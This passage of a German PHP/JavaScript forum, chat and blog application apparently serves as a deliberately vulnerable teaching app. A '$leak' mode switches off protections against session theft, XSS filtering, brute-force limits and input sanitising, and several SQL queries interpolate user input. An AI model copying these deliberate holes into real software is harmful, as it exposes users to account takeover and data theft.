: B.line.value.replace(/%/g,'%25').replace(/&/g,'%26').replace(/=/g,'%3D').replace(/\?/g,'%3F'))) != 0)
B.line.value = '';
B.line.focus();
cl(8,0);
break;
case 7: // 7:Formulare Initialisieren edit
if(!C)
C = cl(1,'news').split(';'); // Universale Infos abholen
x = [];
y = cl(1,'user').split(','); // Chat-User Infos abholen
for(z=0;z<y.length;z+=2) // User-Infos aufbereiten
x[y[z]] = y[z+1];
y = B.user.getElementsByTagName('option'); // User-Liste aktualisieren
for(z=1;z<y.length;z++)
if("
.(($status/2%2) ? "y[z].value == 0 || " : "")."(w = x[parseInt(y[z].value,10)]) && y[z].value != $uid && w%2)
y[z].style.display = 'block',
y[z].disabled = ("
.(($status/2%2) ? "y[z].value == 0 || " : "")."(Math.floor(w/4)%2) && (Math.floor(w/8)%2) == B.crypt.checked) ? false : true;
else
y[z].style.display = 'none',
y[z].disabled = true;
w = C[0].split(','); // Chat Status ermitteln
if(w[7] != '-') // Verbinden mit einen User
B.quit.disabled = false, // Im Chat
B.quit.style.display = 'inline',
B.call.disabled = true,
B.call.style.display = 'none',
B.user.disabled = true,
B.crypt.disabled = true;
else {
B.quit.disabled = true, // Kein Chat
B.quit.style.display = 'none',
B.user.disabled = false,
B.crypt.disabled = false,
window.name = window.name.replace(/\w+$/,'-');
if(parseInt(B.user.value,10))
B.call.disabled = false,
B.call.style.display = 'inline';
else
B.call.disabled = true,
B.call.style.display = 'none';
}
u = document.getElementById('view');
if(w[7] > 0) { // Chat mit User gestartet
if(B.send.disabled)
u.innerHTML = '',
B.line.value = '';
u.style.backgroundColor = '#ffffff',
B.line.disabled = false,
B.send.disabled = false,
B.doit.disabled = false;
B.line.focus();
}
else // Chat mit User beendet
u.style.backgroundColor = '#eeeeee',
B.line.disabled = ((parseInt(B.user.value,10) > 0 && !B.call.disabled) ? false : true),
B.send.disabled = true,
B.doit.disabled = true;
break;
case 8: // 8:[news] Ereignisse Abfragen/Auswerten
v = y;
if(B.line.value == B.copy.value) {
E = cl(1,'news:' + E).split(';');
if(E.length == 1 && E[0] == '0') // User noch Online?
location.reload();
w = C[0]; // Alten Chat-Status retten
C = E; // Chat-Status aktualisieren
E = E[1]; // Letzte ID
if(w != C[0]) // Es gab Änderungen an den laufenden Chats
cl(7,0);
w = C[0].split(','); // Chat Erlauben/Ablehnen
u = window.name.match(/^key:(\w+),(\w+),([\w-]+)$/); // Eigene Keys (Secret-Key,Public-Key,Chat-Key)
if(w[8] != null && w[8] != '-') { // Chatanfrage bekommen
z = w[9].match(/^(?:key:(\w+):)?(.*)$/), // Public-Key vom Chat-Partner
w = w[8];
if(!cl(0,[!(typeof z[1] == 'undefined' || z[1] == ''),B.crypt.checked])
&& (B.edit[1].checked || B.edit[2].checked && confirm('Chatanfrage von:\\x20' + cl(11,w) + '\\n' + unescape(z[2])))) { // Probleme mit IE6
if(F && B.crypt.checked && z[1] && u) {
if(u[3] == '-')
window.name = window.name.replace(/-$/,(u[3] = CryptoJS.MD5(u[1] + navigator.userAgent + new Date().getTime())));
w += ',' + u[2] + ',' + CryptoJS.AES.encrypt('key:' + u[3] + ';',bigInt(z[1],F[2]).modPow(bigInt(u[1],F[2]),bigInt(F[0],F[2])).toString(F[2]));
}
}
else {
if((B.edit[1].checked || B.edit[2].checked) && cl(0,[!(typeof z[1] == 'undefined' || z[1] == ''),B.crypt.checked])) // Probleme mit IE6
cl(10,'Intern,0,<h4>' + ((z[1]) ? 'V' : 'Unv') + 'erschlüsselte Chatanfrage von:\\x20' + cl(11,w)
+ '\\x20abgelehnt!\\x20-\\x20Verschlüsselung ist ' + ((B.crypt.checked) ? 'ein' : 'aus') + 'geschaltet!<\/h4>' + unescape(z[2]));
w = '-' + w;
}
cl(1,'auth:' + w);
}
if(parseInt(C[2],10)) // Neu Nachrichten Anzeigen/Ausgeben
for(z=3;z<C.length;z++)
if((w = C[z].match(/^(\d+),(\d{4})(\d\d)(\d\d)(\d{6}),(?:key:(\w+)\/?([\/\w+=]*):)?([^\\0]*)$/))) {
if(F && u && w[6] && w[7] && w[1] ==
$uid && u[3] == '-') { // Schlüssel zum Entschlüsseln dabei?
u[3] = CryptoJS.AES.decrypt(w[7],bigInt(w[6],F[2]).modPow(bigInt(u[1],F[2]),bigInt(F[0],F[2])).toString(F[2]));
u[3] = String((String(u[3]).match(/^key:\w+;$/)) ? u[3] : u[3].toString(CryptoJS.enc.Latin1)).replace(/^key:(\w+);$/,'$1');
window.name = window.name.replace(/-$/,u[3]);
}
if(w[8] != '') // Leere Nachrichten überspringen
cl(10,cl(11,w[1]) + ',' + w[4] + '.' + w[3] + '.' + w[2] + ' ' + w[5].replace(/(\d\d)(?=\d)/g,'$1:')
+ ((F && u && u[3] != '-' && w[8].match(/^[\/\w+]+=+$/) && (x = w[8].match(/^(\w+)\/(.*)$/))) ? '!,'
+ (((y = CryptoJS.AES.decrypt(x[2],u[3]).toString(CryptoJS.enc.Utf8)) && CryptoJS.MD5(u[3] + ',' + y) == x[1])
? y : '<h3>Verschlüsselung fehlgeschlagen:<\/h3>' + x[2]) : ',' + unescape(w[8])));
}
}
else
B.copy.value = B.line.value;
if(v)
setTimeout('cl(8,1)',parseInt(B.wait.value,10)*1000);
break;
case 9: // 9:[edit/crypt] Ereignisse Abfragen/Auswerten
v = y;
if(y && !window.name.match(/^key:\w+,\w+,[\w-]+$/)) {// key:<secret-key>,<public-key>,<crypt-key>
try {
x = bigInt(F[0],F[2]); // prime als bigInt
y = bigInt(F[1],F[2]); // main als bigInt
z = bigInt.randBetween(y,x); // Secret-Key
window.name = 'key:' + z.toString(F[2]) + ',' + y.modPow(z,x).toString(F[2]) + ',-';
// alert('Neue Schluessel wurden erzeugt!');
}
catch(y) { // Verschlüsselung macht fehler
v = 0;
B.crypt.checked = false;
alert('Computer sagt NEIN!');
}
}
cl(1,'edit:' + ((B.edit[0].checked * 0 + B.edit[1].checked * 1 + B.edit[2].checked * 3) + v * 4)); // Neuen Status zum Forum schicken
cl(7,0); // GUI aktualisieren
break;
case 10: // 10:Inhalte Ausgeben
y = y.match(/([^,]+),([^,]+?)(!?),([^\\0]+)/);
v = /<(?!\/?(big|br|code|del|em|ins|small|strong|su[bp]|tt"
.(($leak) ? "|a|font|img|iframe|span)\W" : ")>").")[^\>]*>/g; // Whitelist für HTML-Inline
x = [document.getElementById('view'),document.createElement('p'),'<b>' + y[1] + '<\/b>\\x20<small>(' + ((y[2] != 0) ? y[2] : new Date().toLocaleString()) + ')<\/small>'
+ ((y[3]) ? '\\x20<span onclick=\'prompt(\"Schlüsselbund:\",window.name.replace(/^key:/,F[0] + \",\" + F[1] + \",\"))\' title=\'Verschlüsselt\'>
$lock<\/span>' : ''),
y[4]"
.(($leak) ? "" : ".replace(v,'')")."]; // Im Sicherheitsmodus nur Inline-Elemente ohne weitere Angaben zulassen
x[1].setAttribute('class','cr');
try {
x[1].innerHTML = '<fieldset><legend>' + x[2] + '<\/legend>' + x[3] + '<\/fieldset>'; // Layout mit Block-Elementen
}
catch(e) { // Workaround for IE6
x[1].innerHTML = x[2] + '<br \/>' + x[3].replace(v,''); // Nur Inline-Elemente zulassen
}
x[0].appendChild(x[1]);
x[0].scrollTop = x[0].scrollHeight;
break;
case 11: // 11:Benutzernamen zurückgeben
return (D[y]) ? D[y] : 'Unbekannt';
}
return 0;
}
var A,B,C,D,E,F,u,v,w,x,y,z; // Vorsicht bei JMORSWXYZ (Noch frei: GHIKLNPQTUV)
try { // Rückkanalmethode festlegen
A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
B = document.chat,
D = [], // Userliste erstellen
E = '0', // Chatnachrichten-Zähler zurücksetzen
F =
$a, // [$jschat[prime],$jschat[main],$jschat[base]]
y = B.user.getElementsByTagName('option'); // Benutzernamen auslesen
for(z=1;z<y.length;z++)
D[y[z].value] = y[z].firstChild.data;
y = B.wait.getElementsByTagName('option'); // Refresh-Zeiten für Ajax optimieren
for(z=0;z<y.length;z++)
y[z].style.display = 'block',
y[z].disabled = false;
B.wait.value = 10; // Refresh auf 10 Sekunden setzen
document.getElementById('view').style.display = 'block'; // Chatanzeige aktivieren
document.getElementById('sr3').style.display = 'inline'; // Chatanfragen 'Zeigen' aktivieren
if(F && typeof bigInt != 'undefined' && typeof CryptoJS != 'undefined')// Prüfen ob die Verschlüsselung möglich ist
document.getElementById('cryptchat').style.display = 'inline'; // Verschlüsselung optisch aktivieren
else
F = false, // Verschlüsselung deaktivieren, weil nicht verfügbar
B.crypt.checked = false;
cl(9,B.crypt.checked); // GUI Initialisieren
cl(8,1);"
)."//--></script></form>";
$out .= (isset($_GET['nojs'])) ? preg_replace("!</?noscript>|<script[^>]*>.*</script>|\son(submit|click|change)='.*?'!s",'',$var) : $var;
}
elseif(isset(
$_REQUEST['chat'])) { // Gästen ermöglichen Admin-Messages zu Empfangen
$out = "0";
if(
preg_match('/^(news)(?::(.+))?$/',$_REQUEST['chat'],$chat) and ($var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = 0")) > ($val = intval($chat[2]))) {
$out .= ";$var;";
if(
$var > $val and $array = $sql['aq']($conn, /* 2 Anzahl der Messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where chat = '0' and id >
$val" /* Keine Chatanfragen anzeigen (Hack ermöglichen) */."
order by id"
) and count($array)) {
$out .= count($array);
foreach(
$array as $var)
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
}
header('Content-Type: text/plain');
die(
$out);
}

# Eingaben von Formularen auswerten
if(count($_POST) > 0) {
if(isset(
$_COOKIE[session_name()]) and $_COOKIE[session_name()] == session_id()) { // Auf Gültige Session prüfen
if(!$leak and isset($_SESSION['flc']) and $_SESSION['flc'] >= $flc) { // Im Sicherheitsmodus Brute-Force erschweren
header('HTTP/1.0 403 Forbidden');
die(
"<h1>Verboten!</h1>");
}

# Neuanmeldung
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and (isset($_POST['register']) or isset($_POST['change']) or isset($_POST['kill']))) {
$array = array(
'username' => '[\w.-]{1,64}', 'password' => '[[:print:]]{0,64}', 'probate' => '[[:print:]]{0,64}',
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}', 'question' => '\d{0,8}',
'myquestion' => '[\w,. ?-]{0,96}', 'answer' => '[\w. -]{0,96}', 'town' => '[\w. -]{0,64}',
'info' => '[^\']{0,255}', 'born' => '(\d{2}\.\d{2}\.(19|20)\d{2})?',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)',
'page' => '((https?:\/\/)?([\w.-]+|\[[\d:a-f]+\])(:\d+)?(\/[\w:;.,_%?=&#\[\]\/-]*)?)?');
$wrt = (floor($status%4/2) and isset($_POST['id']) and preg_match('/\d*/',$_POST['id'],$var)) ? $var[0] : false;
foreach(
$array as $key => $var)
if(isset(
$_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
if(isset(
$post) and count($post) == count($array) and $post['password'] == $post['probate']) {
if(isset(
$post['born']) and $post['born']) {
$post['born'] = implode('-',array_reverse(explode('.',$post['born'])));
if(
strtotime($post['born']) > time())
unset(
$post['born']);
}
$val = $post['probate'];
unset(
$post['probate']);
$salt = (!$leak) ? substr(preg_replace('/\W/','',crypt(rand().time())),-12) : false;
if(
$salt and $post['password'] != '')
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$post[password]-".strtolower($post['username']));
if(isset(
$post['question']) and isset($post['answer']) and $post['answer'] != '' and ($post['question'] or isset($post['myquestion']) and $post['myquestion'] != ''))
$post['passhelp'] = ((!$post['question'] and $post['myquestion'] != '') ? "0-$post[myquestion]:" : "$post[question]-")."$post[answer]";
foreach(array(
'question','myquestion','answer') as $var)
unset(
$post[$var]);
foreach(
$post as $key => $var)
$post[$key] = $sql['es']($var);
$key = '(localhost|127(\.\d{1,3}){3}|::1|[\w.-]\.xx)';
if(!
$leak and array_search($val,explode(' ',$attack['_wordlist_'])) !== false)
$out .= "<h3 align='center'>Das Kennwort aus einen <a$rel$tgb href='$wiki/".urlencode("Wörterbuchangriff")."'>Wörterbuch</a> ist zu einfach - Bitte ein sicheres wählen!";
elseif(
$ipck and !preg_match("/@$key$/",$post['mail']) and ($var = preg_replace('/^[^@]*@/','',$post['mail'])) == gethostbyname($var))
$out .= "<h3 align='center'>Die eMail-Adresse läßt sich nicht auflösen oder ist gerade Offline!</h3>";
elseif(
$ipck and preg_match("/^$array[page]$/",$post['page'],$var) and count($var) > 3 and !preg_match("/^$key$/",$var[3]) and $var[3] == gethostbyname($var[3]))
$out .= "<h3 align='center'>Die Homepage-Adresse läßt sich nicht auflösen oder ist gerade Offline!</h3>";
elseif(
$user and isset($_POST['register']) and $post['password'] != '') {
if(!
$var = $sql['aq']($conn,"
select (select username
from [user]
where username like '
$post[username]') as user,
(select mail
from [user]
where mail like '
$post[mail]') as mail
where user is not null
or mail is not null"
,SQLITE_NUM)) {
if(
$sql['sq']($conn,"select count(*) from [user]") == 0) // Admin
$post['status'] = 2;
if(!
$sql['e']($conn,"
insert into [user] ([create],[change],["
.implode("],[",array_keys($post))."])
values (datetime('now','localtime'),
datetime('now','localtime'),
'"
.implode("','",$post)."')"))
$out .= "<h3 align='center'>Der Benutzer konnte nicht angelegt werden!</h3>";
else
$request = 'Profil';
}
else {
$key = array();
if(!
is_null($var[0][0]))
$key[] = 'Benutzername';
if(!
is_null($var[0][1]))
$key[] = 'eMail-Adresse';
$out .= "<h3 align='center'>".implode(' und ',$key).((count($key) > 1) ? " sind" : " ist" )." schon im System vorhanden!</h3>";
}
}
elseif(
$uid and (isset($_POST['change']) or isset($_POST['kill'])) and isset($_POST['userpass'])
and (
$status/2%2 or !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass'])) and ($sql['sq']($conn,"
select count(*)
from [user]
where (username like '
$post[username]' or id = '$wrt')
and password='"
.$sql['es']($_POST['userpass'])."'") or preg_match('/^salt:(.+?)-hash:(\w+)$/',$sql['sq']($conn,"
select password
from user
where (username like '
$post[username]' or id = '$wrt')"),$var) and $var[2] == $hash[0]("$var[1]-$_POST[userpass]-".strtolower($post['username'])))) {
if(isset(
$_POST['change'])) {
if(
$post['password'] == '')
if(
$salt and !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass']))
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$_POST[userpass]-".strtolower($post['username']));
else
unset(
$post['password']);
$array = array();
foreach(
$post as $key => $var)
$array[$key] = "[$key]='$var'";
$val = str_replace('=',' like ',$array['username']);
if(
$wrt)
$val = "($val or id = $wrt)";
@
$sql['e']($conn,"
update [user] set status=0
where
$val and status is null");
if(!
$sql['e']($conn,"
update [user] set [change]=datetime('now','localtime'),
"
.implode(",",$array)."
where
$val
and (status%2=1 or
$status/2%2 = 1)"))
$out .= "<h3 align='center'>Ihre Daten konnten nicht geändert werden!</h3>";
else
$request = 'Profil';
}
elseif(isset(
$_POST['kill']) and $var = $sql['sq']($conn,"
select id
from [user]
where [username] like '
$post[username]'
and (status%2=1 or
$status/2%2 = 1)")) {
$sql['e']($conn,"
update [user] set
[change]=datetime('now','localtime'),
[changes]=[changes]+1,
[status]=NULL
where id=
$var");
$request = '';
}
}
else
$out .= "<h3 align='center'>Ihr altes Kennwort stimmt nicht!</h3>";
}
else
$out .= "<h3 align='center'>Sie haben nicht alle Eingabefelder korrekt ausgefüllt!</h3>";
}

# Kennwort Vergessen
if(!$uid and isset($_POST['restore'])) {
$post = array();
$wrt = ($leak) ? array() : array(
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)');
$array = array_merge($wrt,array( 'question' => '\d{1,8}',
'answer' => '[\w. -]{1,96}', 'username' => '[\w.-]{1,64}',
'password' => '[[:print:]]{1,64}', 'probate' => '[[:print:]]{1,64}'));
foreach(
$array as $key => $var)
if(isset(
$_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
if(isset(
$post['username']) and ($leak or isset($post['mail']) and isset($post['forename']) and isset($post['lastname']))) {
if(
$var=$sql['sq']($conn,"select passhelp from [user] where username like '$post[username]'".(($leak) ? "" : " and mail like '$post[mail]'")) and preg_match('/^(\d+)-(?:(?<=0-)(.+?):)?/',$var,$var)) {
if(!
$post['question'] = $var[1])
$post['myquestion'] = ($var[2] != '') ? $var[2] : false;
}
else
$out .= "<h3 align='center'>Das Kennwort kann nicht zurückgesetzt werden, da keine Sicherheitsfrage hinterlegt wurde!</h3>";
if(isset(
$post['password']) and isset($post['probate']) and $post['password'] == $post['probate']) {
if(isset(
$post['question']) and isset($post['answer']) and ($leak or isset($post['forename']) and isset($post['lastname'])) and $sql['e']($conn,"
update [user]
set password='"
.$sql['es']($post['password'])."'
where username like '
$post[username]'".(($leak) ? "" : "
and mail like '
$post[mail]'
and forename like '
$post[forename]'
and lastname like '
$post[lastname]'")."
and passhelp like '
$post[question]-".((!$post['question'] and isset($post['myquestion']) and $post['myquestion']) ? "$post[myquestion]:" : "")."$post[answer]'") and $sql['c']($conn)) {
$request = '';
$out .= "<h3 align='center'>Ihr Kennwort wurde jetzt neu gesetzt!</h3>";
$row = true;
}
else {
$out .= "<h3 align='center'>Die Sicherheitsfrage muss korrekt beantwortet werden!</h3>";
if(!
$leak)
$_SESSION['flc'] = (isset($_SESSION['flc'])) ? $_SESSION['flc'] + 1 : 1;
}
}
else
$out .= "<h3 align='center'>Sie haben noch kein neues korrektes Kennwort vergeben!</h3>";
}
else
$out .= "<h3 align='center'>Sie müssen alle Felder ausfüllen!</h3>";
}

# Login durchführen
if(!$uid and ($row or isset($_POST['login'])) and isset($_POST['username']) and isset($_POST['password'])) {
$post = array( 'username' => preg_replace('/[^\w.:@\[\]-]+/','',$_POST['username']),
'password' => preg_replace('/[^[:print:]]/','',$_POST['password']));
if((
$val = $sql['aq']($conn,"
select id,username,password,status,change
from [user]
where (username like '
$post[username]'
or mail like '
$post[username]')
and status is not null"
)) and $val = $val[0] and (preg_replace('/^salt:\w+-hash:\w+$/','',$post['password']) == $val['password']
or
preg_match('/^salt:(.+?)-hash:(\w+)$/',$val['password'],$var) and $var[2] == $hash[0]("$var[1]-$post[password]-".strtolower($val['username']))
or !
$leak and isset($_SESSION['sha']) and preg_match('/^([@\w.-]+):(\w+)$/',$post['password'],$var) and $var[1] == $post['username']
and (
$var[2] == $hash[0]("$_SESSION[sha]-".$val['password']) or $var[2] == $hash[0]("$_SESSION[sha]-".preg_replace('/^salt:\w+-hash:(\w+)$/','$1',$val['password']))))) {
foreach(
$_SESSION as $key => $var)
unset(
$_SESSION[$key]);
$uid = $val['id'];
$status = floor($val['status']/2)*2+1;
$_SESSION['lua'] = $val['change'];
$_SESSION['uid'] = $uid;
$sql['e']($conn,"
update [user] set
status=(status/2%8*2+1),
logins=logins+1,
requests=requests+"
.((isset($_SESSION['src'])) ? $_SESSION['src'] : 0).",
change=datetime('now','localtime'),
ip='
$addr',
session='"
.$sql['es'](session_id())."',
useragent='"
.$sql['es']($_SERVER['HTTP_USER_AGENT'])."'".((isset($_POST['info'])) ? ",
info=nullif('"
.$sql['es']($_POST['info'])."','')" : "")."
where id="
.$val['id']);
if(isset(
$_SESSION['src']))
unset(
$_SESSION['src']);
if(!
$request and !$query)
$request = 'Profil';
if(isset(
$_POST['forever']) and $_POST['forever'])
setcookie('login',"$uid.".$hash[0]("$val[username]:$val[password]"),time()+$ctl,$self);
else
setcookie('username',$val['username']);
}
else {
$post['password'] = '';
if(!
$leak)
$_SESSION['flc'] = (isset($_SESSION['flc'])) ? $_SESSION['flc'] + 1 : 1;
}
}

# Profil speichern
if($uid and !isset($_POST['stop']) and !isset($_POST['test']) and isset($_POST['profil']) and $sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
profil=nullif('"
.$sql['es']($_POST['profil'])."','')
where id="
.((isset($_POST['uid']) and $_POST['uid'] != $uid and preg_match('/\d+/',$_POST['uid'],$var)) ? "$var[0]
and (select status
from [user]
where id=
$_SESSION[uid])%4 = 3" : "$_SESSION[uid] and status%2=1"))) // XSS
$request = 'Profil';

# Blog Bearbeiten
if($request == 'Beitrag' and $uid and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['message']) and isset($_POST['title']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)
and
$uid == $_POST['mail'] and $_POST['mail'] == $sql['sq']($conn,"select userid from [forum] where id = $var[0]") and $sql['e']($conn,"
update [forum] set"
.((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? "\n\t\tstatus=status/2%2*2+$val[0]%2," : "")."
change=datetime('now','localtime'),
changes=changes+1,
ip='
$addr',
useragent='"
.$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
title=nullif('"
.$sql['es'](strtr($_POST['title'],$html))."',''),
message='"
.$sql['es'](strtr($_POST['message'],$html))."'
where status is not null and id =
$var[0]"))
$request = 'Blog';

# Forum Betrag speichern
elseif($var = array('') and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['title']) and isset($_POST['max']) and isset($_POST['message']) and $_POST['message'] != ''
and ($uid or $gast) and ($_POST['max'] == $sql['sq']($conn,'select max(id) from [forum]') or (($gast) ? 0 : $uid) != $sql['sq']($conn,"
select userid
from [forum]
where id = (select max(id)
from [forum])"
)) and ($_POST['mail'] == '' or preg_match('/^\d+$/',$_POST['mail'],$var) and $sql['sq']($conn,"
select id
from [user]
where status is not null and id=
$var[0]")) and $sql['e']($conn,"
insert into [forum] ([create],[change],[status],[userid],[mailid],[ip],[useragent],[path],[title],[message])
values (datetime('now','localtime'),datetime('now','localtime'),
"
.((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? $val[0]%2 : 0).",
"
.(($uid) ? $uid : 0).",
nullif('
$var[0]',''),
'
$addr',
'"
.$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
nullif('"
.((isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$val) and $val = $sql['sq']($conn,"select ifnull(path,'/')||id||'/' from [forum] where id=$val[0]")) ? $val : '')."',''),
nullif('"
.$sql['es'](strtr($_POST['title'],$html))."',''),
'"
.$sql['es'](strtr($_POST['message'],$html))."')"))
$request = ($var[0]) ? (($var[0] == $uid) ? 'Blog' : 'Mail') : '';
}
else
$out .= "<h3><a$rel$tgb href='$wiki/Hypertext_Transfer_Protocol#HTTP_POST'>POST-Requests</a> ohne <a$rel$tgb href='$wiki/Sitzungsbezeichner'>Session-Cookies</a> werden ignoriert!</h3>";
}

# uid in der Datenbank und angemeldet? - Sonst automatisch abmelden
if($uid and isset($_SESSION['uid'])) {
if(
$sql['sq']($conn,"
select id
from [user]
where id=
$uid".(($leak) ? "" /* Session-Klau ermöglichen */ : "
and useragent='"
.$sql['es']($_SERVER['HTTP_USER_AGENT'])."'")."
and status%2=1"
) == $uid) {
$sql['e']($conn,"
update [user] set change=datetime('now','localtime'),
requests=requests+1
where id=
$uid and status=(status/2%8*2+1)");
$un = $sql['sq']($conn,"select username from [user] where id = $uid");
}
else {
$sql['e']($conn,"
update [user] set status=(status/2%8*2)
where id=
$uid");
foreach(
$_SESSION as $key => $var)
unset(
$_SESSION[$key]);
setcookie(session_name(),'',time()-$ctl,'/');
$status = 0;
$uid = false;
}
}

# Mails löschen
if(preg_match('/Blog|Mail/',$request) and $uid and isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var) and $uid == $sql['sq']($conn,"select mailid from [forum] where id = $var[0]"))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");

# Tagline speichern
if($uid and !isset($_REQUEST['stop']) and !isset($_REQUEST['test']) and isset($_REQUEST['tl']))
$sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
tagline=nullif('"
.$sql['es']($_REQUEST['tl'])."','')
where id="
.(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid));

# Abmelden
if(preg_match('/^Abmelden\s?$/',$request)) {
if(
$sql['e']($conn,"
update [user] set status=(status/2%8*2),
chat=null,
change=datetime('now','localtime')
where "
.((isset($_GET['id']) and $_GET['id']) ? "(select status%4 from [user] where id=nullif('$uid',''))=3 and id=".(($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id']))
:
"id='$uid' and status%2=1")) and $sql['c']($conn) and (!$status/2%2 or !isset($_GET['id']))) {
session_unset();
if(isset(
$_COOKIE['login'])) {
setcookie('login',0,time()-$ctl,$self);
unset(
$_COOKIE['login']);
}
}
// if(substr($request,-1) != ' ')
$request = '';
$uid = $status = false;
}

# Login Forumlar
if(!$uid and (!preg_match('/^(Anmelden|Kennwort|SQL|Beitrag|Creole)$/',$request,$var) and !$info[3] and (($user or !$lone) and !$content or !is_array($content) and preg_match('/(<|&lt;){3}login(\d?)(&gt;|>){3}/i',$content,$var) or $request == 'Login') or !$inet and !$local and trim($request) == 'Impressum')) {
if(!(isset(
$post['username']) and $post['username']) and isset($_COOKIE['username']) and $_COOKIE['username'])
$post['username'] = ($leak) ? $_COOKIE['username'] : preg_replace('/^([^\w.:@\[\]-]*).*$/','$1',$_COOKIE['username']);
if(!
$leak and $hash)
$head['hash'] = "<script type='text/javascript' src='$hash[1]'></script>";
$out = "<table align='right' id='lis' style='display:none'><tr><td><a href='#' title='Login einblenden' onclick='".strtr(preg_replace($js,'',"
document.getElementById('lih').style.display = 'block';
document.getElementById('lis').style.display = 'none';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<0)) + (1<<0) * 0 : 0)+ '; path=
$self';
return false;
"
),array('&' => '&amp;', "'" => '"'))."'>&laquo;</a></td></tr></table>
<table align='right' id='lih' cellspacing='0' cellpadding='0'><tr><td><form name='login' action='
$self".(($request) ? "/$request" : "")."' method='post'".(($leak) ? "" : " onsubmit='".strtr(preg_replace($js,'',"
if(typeof
$hash[2] == 'function' && $hash[2]()) {
try { // Request vorbereiten
var a = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
a = new ActiveXObject('Microsoft.XMLHTTP');
}
a.open('GET','
$self?salt=' + x.username.value,false); // Salt vom Benutzer anfordern
a.send('');
x.password.value = x.username.value + ':' +
$hash[3]('".($_SESSION['sha'] = $hash[0](time().rand().implode(":",$_SERVER)))."' + '-' + ((a=a.responseText.match(/^([\w.-]+):(\w+)$/)) ? $hash[3](a[2] + '-' + x.password.value + '-' + a[1].toLowerCase()) : x.password.value));
}"
),array('&' => '&amp;', "'" => '"'))."'").">
<fieldset><legend><b>Login</b> <a href='#' title='Login ausblenden' id='lia' style='display:none' onclick='"
.strtr(preg_replace($js,'',"
document.getElementById('lih').style.display = 'none';
document.getElementById('lis').style.display = 'block';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<0)) + (1<<0) * 1 : 1<<0) + '; path=
$self';
return false;
"
),array('&' => '&amp;', "'" => '"')).preg_replace($formcheck[0],$formcheck[1],"'>&raquo;</a></legend>
{username|Benutzername oder eMail:|20|64|tabindex=1}<br />{password|Kennwort:"
.((!$local and !$inet) ? "" : " (<a href='$self/Kennwort'>Vergessen?</a>)")."|*20|64|tabindex=2}<br />
<input type='checkbox' id='forever' name='forever' value='1' /> <label for='forever'><small title='Für "
.floor($ctl/(24*60*60))." Tage'>Angemeldet bleiben</small></label><br />
<input type='hidden' name='info' value='' /><input type='submit' name='login' value='OK' tabindex='3' /><br /><br />"
.(($user and ($local or $inet)) ? "<a href='$self/Anmelden'>Neues Mitglied werden</a>" : ""))
.
"</fieldset></form></td></tr></table><script type='text/javascript'><!--\n".preg_replace($js,'',"
document.getElementById('lia').style.display = 'inline';
if(window.innerWidth && window.innerWidth < 1000 || ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) && x[2] & (1<<0))"
.((is_array($var) and isset($var[2]) and $var[2]) ? " || 1" : "").")
document.getElementById('lih').style.display = 'none',
document.getElementById('lis').style.display = 'block';
var x = document.login;
x.info.value = screen.width + ',' + screen.height + ',' + screen.colorDepth;
if(x.username.value == '')
x.username.focus();
else
if(x.password.value == '')
x.password.focus();
"
)."//login//--></script>$out";
}

# Datei-Upload
if($uid and $request == 'Datei') {
$len = $sql['sq']($conn,"select sum(abs(size)) from [file] where user = $uid and status is not null");
if(isset(
$_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name'])) {
$name = preg_replace('/[^\w!,.-]/','',((isset($_POST['name']) and $_POST['name'] != '') ? $_POST['name'] : $_FILES['file']['name']));
if(!
$status/2%2 and ($len + $_FILES['file']['size']) > $maxfile)
$out .= "<h3>Sie haben ihren Datei-Upload Content um ".number_format(($len - $maxfile),0,',','.')." Bytes überschritten!</h3>";
elseif(!
$type = array_search(strtolower(preg_replace('/^.*?\.(\w+)$/','$1',$name)),$type) and !$status/2%2)
$out .= "<h3>Ihr Datei-Upload besitzt einen nicht erlaubten Datei-Type!</h3>";
else {
$data = file_get_contents($_FILES['file']['tmp_name']);
$crc = str_pad(dechex(crc32($data)),8,0,STR_PAD_LEFT);
$size = strlen($data);
$len += $size;
$var = array_merge(array(
'[create]' => "datetime('now','localtime')",
'[status]' => (int)$_POST['right'] + (int)$_POST['status'],
'[user]' => $uid,
'[name]' => "'$name'",
'[ip]' => "'$addr'",
